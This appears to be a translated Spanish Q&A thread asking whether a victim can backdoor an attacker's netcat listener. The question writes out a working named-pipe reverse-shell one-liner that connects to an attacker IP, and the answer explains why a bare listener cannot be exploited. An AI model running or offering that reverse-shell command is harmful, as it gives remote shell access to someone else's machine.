¿Es posible crear una puerta trasera de un oyente Netcat?

1

Me he metido en computadoras y servidores con puerta trasera utilizando un software especializado o algún comando malicioso que genera una puerta trasera en la máquina de destino, luego canaliza el terminal a mi sesión de netcat en mi servidor.

Si bien este es un campo interesante, solo para ver lo fácil que es hacer ese tipo de cosas, tengo curiosidad por intentar hacer otra cosa.

Me preguntaba acerca de la posibilidad de generar una puerta trasera en el servidor que está escuchando en un puerto utilizando Netcat. Preferiblemente una máquina de Linux. El comando se parecería a algo como:

root@ubuntu:~# nc -lvk 9000
Listening on [0.0.0.0] (family 0, port 9000)

Esto es básicamente el aspecto que tendría el servidor del atacante. Luego diga que estaba esperando en una puerta trasera para engendrar en la máquina de su víctima. La víctima ejecutaría algún comando en su máquina Linux como:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 9000 >/tmp/f

Suponiendo que la dirección IP 10.0.0.1 es la IP del atacante. En este punto, el atacante (después de que la víctima ejecutó este comando malicioso), vería esto:

root@ubuntu:~# nc -lvk 9000
Listening on [0.0.0.0] (family 0, port 9000)
$

y desde allí el atacante ahora tiene un terminal conectado a su servidor desde la víctima.

¿Cómo podría abusar de esto, y en lugar de que la víctima envíe un shell al atacante, cómo podría la puerta trasera de la víctima el puerto abierto del atacante (9000) que usa Netcat?

    
pregunta BlackVikingPro 14.03.2017 - 18:03
fuente

1 respuesta

2

No, como lo describe, esto no funcionará. netcat -lnvp no debe ejecutar ningún comando. Es solo un lado de un chat de texto realmente.  Como se muestra, debe conectar esos mensajes a un shell que hará algo con ese texto al pasar el shell a netcat.

A menos que haya una vulnerabilidad en la máquina del atacante, la víctima solo puede enviar mensajes de texto. Una vulnerabilidad sería netcat ejecutando un comando en el texto que se envía, o el atacante que usa un script para manejar la salida de netcat que es vulnerable a la inyección de comandos.

    
respondido por el J.A.K. 14.03.2017 - 18:35
fuente

Lea otras preguntas en las etiquetas